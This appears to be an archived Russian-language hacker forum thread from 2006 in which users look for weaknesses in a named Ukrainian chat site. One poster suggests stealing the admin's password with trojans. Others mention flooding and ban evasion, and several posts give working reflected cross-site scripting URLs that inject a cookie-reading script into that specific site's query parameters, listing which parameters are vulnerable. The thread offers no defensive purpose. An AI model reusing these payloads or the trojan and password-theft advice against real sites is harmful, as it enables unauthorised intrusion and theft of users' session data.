Просмотр полной версии : http://chatinet.zp.ua/
http://chatinet.zp.ua/ кто нибудь знает чтото о нем???
нет там нечего =)
и драствуй земляк =)
Попробуй добыть пароль у админа, кинь пару троянчиков)
Флуд без проблем :)
банан обходится легко.
nc.STRIEM
24.10.2006, 00:48
Мне этот чат знаком до боли...
Уже незнаю скок раз пытался там баги найти!!! Не нашол нчего, все че получалось это ток флуд))
че могу сказать, чат действительно клево сделан (я имею ввиду безопасность)
ну есле кто чего найдет, поделитесь будет очень интересно!
и драствуй земляк =)
тебе тож драсте )))
нет там нечего =)
Да? :D
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>
upd
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>
Заменяем 001, на:
002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016.
Везде там xss:)
Плохой из тебя хакер )
http://chatinet.zp.ua/winter2005/party/?"><script>alert(document.cookie)</script>
так тоже можно и короче..
а вообще хсс не должен выдовать данные которыми могут воспользоваться в злосных целях..
nc.STRIEM
27.10.2006, 23:32
а понту с этих Xss они не в профиле, там куки не передаються
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot